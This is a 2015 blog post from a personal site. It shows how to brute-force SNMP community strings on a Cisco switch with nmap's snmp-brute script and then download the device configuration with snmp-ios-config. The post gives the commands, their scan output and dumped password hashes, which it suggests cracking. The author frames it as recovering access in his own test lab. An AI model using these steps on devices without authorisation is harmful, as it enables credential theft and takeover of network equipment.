Wednesday, March 4, 2015

Brute Forcing SNMP with NMAP

Have you ever been on site and no one could remember the password for a network device you needed to log into? Using NMAP and a pre-built text file it may be possible to quickly pull down the configuration of the device.

Once you have the configuration you may find the password in plain text. If not you can use my blog on "Decrypting Cisco type 5 passwords" to recover the password.

A lot of network devices have an SNMP Read/Write (RW) string configured. If they do NMAP has a script to pull down the configuration. But what if you don't know the RW community string? Luckily "private" is the default for a lot of devices and NMAP has a script for that!

To get started, create a file with your guesses. I usually start with just private in the file. If that doesn't work then I paste in my list of guesses. There are a lot of password lists on the Internet but I haven't found any snmp lists. What I have done is created a list based on all the switch/router configs that I have in my possession. If the script finds a community string it prints it out with the words "Valid Credentials". A note here, the script will return "Valid Credentials" whether it finds a RW community string or a Read Only (RO) string. The script used to pull down the configuration ONLY works with the RW string.

As always, DO NOT use this on a switch you don't own or have explicit written permission to work on. This script was run against a Cisco switch in my test lab. It wasn't connected to anything except my laptop.

Let's get started! Run this script and hopefully find a valid RW community string.

nmap -sU --script snmp-brute --script-args snmp-brute.communitiesdb=c:\tftp-root\snmp-string.txt

Starting Nmap 6.47 ( ) at 2015-03-03 15:50 Pacific Standard Time
Stats: 0:13:44 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 86.13% done; ETC: 16:06 (0:01:52 remaining)
Stats: 0:13:45 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 86.22% done; ETC: 16:06 (0:01:52 remaining)
Nmap scan report for
Host is up (0.0057s latency).
Not shown: 996 closed ports
67/udp  open|filtered dhcps
123/udp open          ntp
161/udp open          snmp
| snmp-brute:
|   private - Valid credentials
|_  public - Valid credentials
162/udp open|filtered snmptrap

In this case private was being used as a RW community string. Now that we have the RW community string we can run the script that pulls down the configuration. On this switch there is a type 7 password! In that case just hit the IOS App store or Google Play store and grab a "Cisco Type 7" app. It will recover the password in a split second without a word list.

nmap -sU -p 161 --script snmp-ios-config --script-args snmpcommunity=private

Starting Nmap 6.47 ( ) at 2015-03-03 15:23 Pacific Standard Time
Nmap scan report for
Host is up (0.0031s latency).
161/udp open  snmp
| snmp-ios-config:
| !
| ! Last configuration change at 15:21:28 PST Tue Mar 3 2015 by mhubbard
| ! NVRAM config last updated at 15:21:31 PST Tue Mar 3 2015 by mhubbard
| !
| version 15.0
| no service pad
| service tcp-keepalives-in
| service tcp-keepalives-out
| service timestamps debug datetime msec localtime show-timezone
| service timestamps log datetime msec localtime show-timezone
| service password-encryption
| service sequence-numbers
| !
| hostname ACME_Test
| !
| boot-start-marker
| boot-end-marker
| !
| !
| username Test privilege 15 password 7 0037312531682F2506324F41
| username cisco privilege 15 secret 5 $1$CxMS$kdjNOfZxN6qcqqCWBDEvQ1


No comments:

Post a Comment